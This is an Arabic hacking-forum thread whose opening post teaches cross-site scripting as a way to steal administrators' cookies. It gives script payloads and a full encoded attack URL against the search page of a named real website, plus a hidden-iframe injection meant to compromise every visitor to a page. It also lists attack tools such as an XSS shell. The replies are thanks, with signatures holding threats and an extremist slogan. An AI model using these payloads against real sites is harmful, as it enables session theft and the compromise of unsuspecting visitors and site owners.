تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

  1. #1

    aljyyosh تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    تعريفها
    و هى ثغرة من خلالها يمكنك سحب الكوكيز الخاص بالادمن
    ثغرة [ XSS ] هي اختصار لـ[ Cross site scripting ] وسبب عدم كتابتها بالاختصار الصحيح [ CSS ] لكي لا يحدث خلط مع لغة الـ[ CSS ] الانماط القياسية المعروفة [ Cascading Style Sheets ] , وبذلك تم تسميتها [ XSS ]
    ثغرات [ XSS ] لها نوعين وهما
    1 ثغرات XSS ثابته - مخزّنه [ Persistent - stored ]
    2 ثغرات XSS غير ثابته - غير مخزّنه [ Non persistent - Reflecte

    ثغرات XSS الثابته هي اخطر من النوع الغير ثابت , وذلك لان ثغرات XSS الثابته , مايدخله الزائر ثابت بالصفحه , اي مايدخله مثلاً يخزّن بقاعدة بيانات السكربت
    ثغرات الغير ثابته , هي النوع الاكثر انتشاراً وليس خطورة وهي التي تقوم على اساس الادخال الخاص مثلاً , كما ذكرنا سابقاً عند البحث في المنتديات هنا الحالة تسمى غير ثابته

    الكود المهم في ثغرات xss
    كود:
    **********alert(**************)</script>**********alert("XSS")</script>
    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
    هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
    يحتوي على اليوزر نايم و الباسوورد المشفرmd5
    مثلا ناخذ هذا الموقع
    كود HTML:
    https://www.calacademy.org
    وريح يكون استغلال مثلا بشكل هذا
    كود HTML:
     https://www.calacademy.org/search.php?q=
    الكود هذا نحطو في اخير بعد العلامة (=)
    نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
    كود:
    **********alert(document.cookie)</script>**********alert("XSS")</script>
    المهم يصبح هيك
    كود HTML:
    https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
    1 – تلغيم الصفحة .
    وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب
    كود:
    <html>
     <iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
     </iframe>
     </iframe></p>
     </html>
    عندها سيتم فتح هذا الموقع بطريقة خفية , وسيتم اختراق كل من دخل للصفحة التي تم حقن الكود فيها .
    الادوات :
    شل g.h.t.xssshell
    استضافة تدعم asp
    برنامج ftp FileZilla_3.7.3_win32-setup.exe Show file details (recommended)
    موقع للتلغيم (كل شغص يختار اي موقع للتلغيم )
    برنامج الختراق
    وهذا الفيديو يشرح لكم طريقة استغلال الثغرة
    وفي الاخير اتمنى ان اكون قد اوصلت لكم المعلومات الكافية
    وارجو من الله تعالى ان يوفقني ويوفقكم فيما يحبه ويرضاه والسلام عليكم
    لاتنسونا بتققيم الموضوع

    - - - تم التحديث - - -
    التعديل الأخير تم بواسطة aymandz ; 01-24-2014 الساعة 08:26 PM

    (لن اطلب الرحمة من احد لانه سوف ياتي اليوم الذي لن ارحم فيه احد )

  2. #2

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك ننتظر منك المزيد صديقي مشكور للشرح

    ✔™Verified Account™✔
    ││█║▌║▌ █ ║▌│█│║▌
    skype belal.root

    my facebook: fb.com/palastenian.ghost
    fb.com/jor.ghost

    my website: http://jordanghost.webs.com/

  3. #3

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك على الموضوع ... بالتوفيق

    لا اله الا الله محمد رسول الله




  4. #4

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    وفيكم بركة

    (لن اطلب الرحمة من احد لانه سوف ياتي اليوم الذي لن ارحم فيه احد )

  5. #5

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك شرح واضح و مفيد
    واصل تقدمك في انتظار جديدك
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



  6. #6

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    جزاك الله خيرا

  7. #7
    هكر مبتديء الصورة الرمزية the punisher
    تاريخ التسجيل
    Dec 2013
    الدولة
    الجيش المصري خير أجناد الأرض - مصر
    المشاركات
    25

    Hasri رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    مشكور عالمجهود الرائع اخي بارك الله فيك
    اذا وضعت يدك عليّ لتؤذيني . فسأرفع قبعتي إحتراما لشجاعتك . ولكن تأكد بأني لن أنزلِها إلا علي قبرك

    دولة الخلافة الإسلامية .. باقية بإذن الله - خـــلافــة علي منهــــاج النـــبوة!

  8. #8

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك

  9. #9

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك

  10. #10

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 10
    آخر مشاركة: 11-08-2012, 02:29 AM
  2. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى منتدى حماية الأجهزة
    مشاركات: 3
    آخر مشاركة: 11-05-2012, 01:02 AM
  3. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  4. ممكن كم برنامج يتعلق بالتشفير...
    بواسطة ذكريات هكر في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 6
    آخر مشاركة: 11-25-2011, 07:03 PM
  5. شرح كامل 100% وكل ما يتعلق بال ( Dos ) الدوس
    بواسطة غروك وغيروك في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 3
    آخر مشاركة: 09-24-2011, 11:09 PM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •